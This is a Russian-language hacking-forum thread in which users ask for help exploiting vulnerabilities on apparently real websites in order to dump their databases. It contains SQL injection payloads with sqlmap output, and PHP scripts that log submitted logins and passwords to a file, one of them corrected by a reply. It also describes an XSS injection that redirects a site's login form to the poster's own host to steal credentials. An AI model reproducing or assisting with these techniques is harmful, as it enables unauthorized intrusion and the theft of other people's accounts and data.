Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    зависит от того, что вы хотите сделать.
     
    _________________________
  2. Genius Black

    Genius Black New Member

    Joined:
    29 Jul 2015
    Messages:
    34
    Likes Received:
    4
    Reputations:
    0
    Залезть в базу и слить данные.

    Все способы, которые можно было - я перепробовал.
     
  3. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Вы что то с запросом сделать пытаетесь или это у вас просто страничка с ошибкой? ссылочку бы показали
     
  4. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    linea='
    linea=\' UNION SELECT version(); #
    Может быть.
     
  5. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    Code:
    клад3.биз/?district_id=-31 раскрутить поможешь?
    ссылка ушла в личку.
     
  6. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Havj не инжектить . Пробовал раскручивать,выдаёт ту же самую ссылку .
    Вот собственно сама ссылочка metravib.acoemgroup.com/application.php?id=3&idm=20&ida=34 1
    Blind Injection .

    MYSQL Injection . Ссылка : www.muziekcentrum.be/carrier.php?id=8333 .

    Как это раскрутить ? Помогите .

    error'овые,не?
     
  7. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Помогите пжл,как сохранять запрос
    Code:
    $fd = fopen($file,"a");
    …
    fputs($fd, " login: ".$_POST['login']." password:".$_POST['password']);
    …
    fclose($fd);
    …
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    код верный, что у вас не выходит?
     
    _________________________
  9. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    А куда он должен сохранять логин и пасс?
     
  10. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,193
    Reputations:
    430
    В $file, имя которого ты указываешь сам.
     
  11. Pro100Nyan

    Pro100Nyan New Member

    Joined:
    15 Mar 2013
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте есть шелл на сервере Windows NT SERVER, нужно узнать какие домены на нем установлены, как можно это узнать ?)) Стоит наверно IIRF(хз что это но такие файлы есть в корне сайтов) вот такие файлы IIRF.ini
     
  12. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Reverse IP не помогает?
     
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    _________________________
  14. Pro100Nyan

    Pro100Nyan New Member

    Joined:
    15 Mar 2013
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    К сожалению там нету такого файла, там одни только .dll файлы :(
     
  15. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Кто-нибудь может в личке помочь и глянуть один сайт? DB Oracle язвимость
    Place: GET
    Parameter: SL
    Type: boolean-based blind
    Title: Oracle boolean-based blind - GROUP BY and ORDER BY clauses
    Payload: ...&SL=54,(SELECT (CASE WHEN (7590=7590) THEN 54 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

    Type: AND/OR time-based blind
    Title: Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)
    Payload: ....&SL=54,(SELECT (CASE WHEN (9646=9646) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(101)||CHR(97)||CHR(117),5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)

    Всё выдётся отлично, вывод хороший, стабильный. Но вместо хеша или пароля в табличке юзоров выдаётся какая-то символьная фигня типа:
    \x1c\x1f\x17\x18\x0ev\x1fjt\x15}

    Притом это не на одном сайте, а на всех сайтах этой платформы.

    Кто имеет время глянуть, напишите в личку, я скину урл. Очень важные для меня сайты на этой полатформе, я бьюсь в отчаянии, не знаю что делать. ПОМОГИТЕ!!!!!!

    UPDATE: прогнала SQLMAP с режимом --binary-fields=PASSWORD, похоже, что пароли хранятся в бинарном виде. Выдаёт следующее:
    157E02680F7F
    1B0C130E197B620B7316
    131E091001
    171E0A0B057F620C7E12
    00051D00087D6B087F17
    171D1C0D0B676A08711D
    0A00011F0A076F0F07600B0A

    Что это за хеши такие? Oracle(DES)? или...? есть идеи?

    PS можно платно:)
     
    #415 vikler, 31 Jul 2015
    Last edited: 1 Aug 2015
  16. djon

    djon New Member

    Joined:
    6 Jul 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Почему у меня ничего не записывает php?
    ------------------------------------------------------------------------------------------------------------
    <?
    var $url = "";

    $ls_username = $_POST['ls_username'];
    $ls_password = $_POST['ls_password'];

    if($('ls_username').value == '' || $('ls_password').value == '') {

    $data = "E-mail: $ls_username \n PAss: $ls_password";
    $filename = "base.txt";
    $fd = fopen( $filename, "w+" );
    fputs( $fd, $data );
    fclose( $fd );
    }

    header("location: $url");
    ?>
    ------------------------------------------------------------------------------------------------------------
    Вставляю этот скрипт
    ------------------------------------------------------------------------------------------------------------
    <script>document.lsform.action=‘http://hosting.ru/base.php’</script>
    ------------------------------------------------------------------------------------------------------------
    в страницу где форма
    ------------------------------------------------------------------------------------------------------------
    <form method="post" autocomplete="off" id="lsform" action="member.php?mod=logging&amp;action=login&amp;loginsubmit=yes&amp;infloat=yes&amp;lssubmit=yes" onsubmit="return lsSubmit();">
    ------------------------------------------------------------------------------------------------------------
    И ничего не происходит,в чем может быть проблема?
     
  17. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116

    Code:
    $url = "";
    $ls_username = $_POST['ls_username'];
    $ls_password = $_POST['ls_password'];
    
    if ($ls_username != null){
      if  ($ls_password != null) {
      $open=fopen('base.txt',"a");
      fwrite($open,"$ls_username;$ls_password\n");
      fclose($open);  
      }
    }
     
    yarbabin and SaNDER like this.
  18. Genius Black

    Genius Black New Member

    Joined:
    29 Jul 2015
    Messages:
    34
    Likes Received:
    4
    Reputations:
    0
    Почему информация об ошибке выводиться только при .php?c=1 group by . Если указывать ' , union , by order или любые другие способы, то ничего не выводит?
     
  19. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Нет инъекции. Только ошибка.
     
  20. djon

    djon New Member

    Joined:
    6 Jul 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Почему когда вставляю код (
    <script>document.getElementById('lsform').action="http://МойХостинг1.ru/base.php?";</script>)
    на сайт где есть активная xss,то она преобразуется так (УязвимыйСайт.ru/base.php) и пишет что "страница не найдена" а на втором моем хостинге где расположена копия сайта (УязвимыйСайт.ru/forum.php) по адрессу (http://МойХостинг2.ru) то логины и пароли идут нормально после нажатия на кнопку Вход,и после нажатия она переадресовывается на ("http://МойХостинг1.ru/base.php?") Почему с (УязвимыйСайт.ru/forum.php) не идут пароли ?
     
    #420 djon, 4 Aug 2015
    Last edited by a moderator: 4 Aug 2015